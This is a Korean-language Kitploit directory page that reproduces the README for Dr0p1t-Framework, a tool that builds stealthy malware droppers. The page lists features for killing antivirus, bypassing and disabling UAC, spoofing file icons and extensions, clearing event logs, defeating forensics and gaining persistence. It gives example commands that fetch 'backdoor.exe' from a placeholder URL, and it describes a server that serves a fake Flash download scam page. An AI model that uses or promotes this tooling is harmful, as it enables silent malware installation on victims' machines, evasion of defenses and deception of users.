Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Dr0p1t-Framework — 대부분의 AV를 우회하고 많은 트릭을 가진 고급 스텔스 드로퍼를 생성하는 프레임워크 | Kitploit
도구/GitHubGitHub/d4vinci/dr0p1t-framework
Privilege EscalationPayload GenerationPersistence MechanismsExploitationIDS/IPS EvasionForensicsPhishingMalware AnalysisCommand and ControlSocial EngineeringPayload DevelopmentAnti-Bot
1.5k3877년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Archived
GitHubd4vinci/dr0p1t-framework

Dr0p1t-Framework

대부분의 AV를 우회하고 많은 트릭을 가진 고급 스텔스 드로퍼를 생성하는 프레임워크

저장소 보기

현재 유지보수 중이 아닙니다 (다음 버전을 기다리세요)


Dr0p1t-Framework n0where best cybersecurity tools Python 3.5 Python 2.7 Build Status

트로이 목마 드로퍼(Dropper)에 대해 들어보신 적이 있나요? 간단히 말해 드로퍼는 다른 악성코드를 다운로드하는 유형의 악성코드이며, Dr0p1t는 대부분의 AV를 우회하고 다양한 트릭(저를 믿으세요 :D)을 갖춘 은밀한 드로퍼를 만들 수 있는 기회를 제공합니다. ;)

기능

+ 생성된 실행 파일 속성:

  • 같은 방식으로 생성된 다른 드로퍼에 비해 실행 파일 크기가 작습니다.
  • 대상 시스템에서 실행 파일을 다운로드하고 조용히 실행합니다.
  • 자체 파괴 기능: 드로퍼가 작업을 마친 후 스스로 종료 및 삭제됩니다.
  • 드로퍼가 생성하는 모든 파일을 정리하고 삭제 전 내용을 지워 디스크 포렌식을 회피합니다.
  • 작업 완료 후 이벤트 로그를 지웁니다.

+ 프레임워크 속성:

  • Windows, Linux에서 작동하며 이제 OSX도 지원합니다 ( @sm4sh3r 님께 감사드립니다 )
  • Dr0p1t-Server 기능(베타): 이제 브라우저에서 작업할 수 있습니다 Dr0p1t-Server 작업 방법 보기
  • Dr0p1t-Server에 스캠 옵션(베타)이 있습니다 Dr0p1t-Server 작업 방법 보기

+ 모듈:

  • 악성코드를 실행하기 전에 안티바이러스를 찾아 종료합니다.
  • UAC를 비활성화하는 기능.
  • 악성코드를 관리자 권한으로 실행하는 기능.
  • 파일 아이콘과 확장자를 원하는 대로 스푸핑하여 완전 위장.
  • ZIP 파일 지원: 이제 실행 파일을 업로드하기 전에 ZIP 파일로 압축할 수 있습니다.
  • 실행 파일을 실행하기 전에 선택한 커스텀 (batch|powershell|vbs) 파일을 실행합니다.
  • PowerShell 스크립트 실행 시 실행 정책을 우회할 수 있습니다.
  • UPX를 사용하여 드로퍼를 생성한 후 압축합니다.

+ 지속성 모듈:

  • 다운로드한 실행 파일을 시작 프로그램에 추가합니다.
  • 다운로드한 실행 파일을 작업 스케줄러에 추가합니다 (UAC는 중요하지 않음).
  • 파일을 PowerShell 사용자 프로필에 추가하여 powershell.exe가 실행될 때마다 파일이 없으면 다운로드 및 실행되도록 합니다.

스크린샷

Windows에서

더 보기

Linux (Kali linux)에서

더 보기

OSX에서

아직 완전히 테스트되지 않았습니다! 기여자와 테스터가 필요합니다 😄

도움말 메뉴

root@kitploit:~
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

예제

root@kitploit:~
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

사전 요구사항

  • Python 2 또는 Python 3.

Python 2 권장 버전은 2.7.x, Python 3 권장 버전은 3.5.x이며, 3.6은 PyInstaller에서 아직 지원하지 않으므로 사용하지 마세요.

Linux에 필요한 종속성

  • apt
  • 나머지는 install.sh 파일에서 설치됩니다.

참고: 루트 권한이 필요합니다.

Windows에 필요한 종속성

  • pip
  • windows_requirements.txt 파일의 모듈들

설치

Dr0p1t 설치 및 사용에 대한 공식 동영상 목록이 있습니다. 재생목록

  • Linux에서
root@kitploit:~
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • Windows에서 (ZIP 다운로드 및 압축 해제 후)
root@kitploit:~
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

참고: python 2.7에는 pip가 없으므로 먼저 get-pip.py 스크립트를 사용하여 설치하세요 [구글 검색]

테스트된 환경:

  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Dr0p1t-Server 작업 방법

참고: 서버는 아직 베타 버전이며 추가할 기능이 많고 더 나은 디자인도 필요합니다 [디자이너의 기여가 필요합니다 :D]

사전 요구사항

  • 안정적인 인터넷 연결.
  • 포트 5000이 사용 중이 아니며 방화벽이 해당 포트 연결을 차단하지 않도록 구성되어야 함.

서버 설치 및 실행

Linux와 Windows 모두 위에서 설명한 단계를 따라 Dr0p1t를 설치한 후, pip를 사용하여 server_requirements.txt의 모듈을 설치합니다.

root@kitploit:~
python -m pip install -r server_requirements.txt

이제 서버 스크립트를 실행해 봅시다:

root@kitploit:~
python Dr0p1t_Server.py

서버 스크립트를 실행하면 flask를 사용하여 포트 5000으로 들어오는 모든 연결을 수신 대기하기 시작합니다.

이제 자신의 기기에서 서버를 사용하려면 브라우저에서 127.0.0.1:5000 또는 [내 IP]:5000을 엽니다.

LAN의 다른 기기에서 열려면 [내 로컬 IP]:5000을, WAN의 다른 기기에서 열려면 [내 글로벌 IP]:5000을 열되, 먼저 라우터가 포트 5000 연결을 사용자에게 전달하도록 구성했는지 확인하세요.

서버 페이지를 열면 필요한 데이터를 요구하는 간단한 디자인의 웹사이트가 표시됩니다. 서버 스크린샷 보기

그런 다음 데이터를 제출하면 몇 가지 프로세스를 통해 검증된 후 exe 파일이 생성되고 스캠 링크를 알려주는 페이지로 리디렉션됩니다.

링크를 입력하면 기본적으로 Adobe Flash 다운로드 페이지인 드로퍼 다운로드 스캠이 표시됩니다. 스캠을 자신의 것으로 교체하려면 "Scam.html" 파일의 내용을 교체하되 변수는 그대로 두세요 (제거하지 마세요).

서버 스크린샷

Windows용 더 보기 Linux용 더 보기

배포 금지 스캔 (바이러스 토탈로 스캔하지 말아주세요:3)

할 일 이 링크 확인

연락처

  • 트위터

기부

이 도구가 유용했다면, 커피 한 잔 사주시는 것만으로도 감사하겠습니다 :)

Coffee

면책 조항

Dr0p1t 프레임워크는 오용 및 불법 목적에 대해 책임을 지지 않습니다. 펜테스트 또는 교육 목적으로만 사용하세요!!!

이 프레임워크의 코드를 복사하거나 다른 도구에서 사용하는 경우 출처를 명시하는 조건으로 허용됩니다 😄

풀 리퀘스트는 언제나 환영합니다 :D

도구 다운로드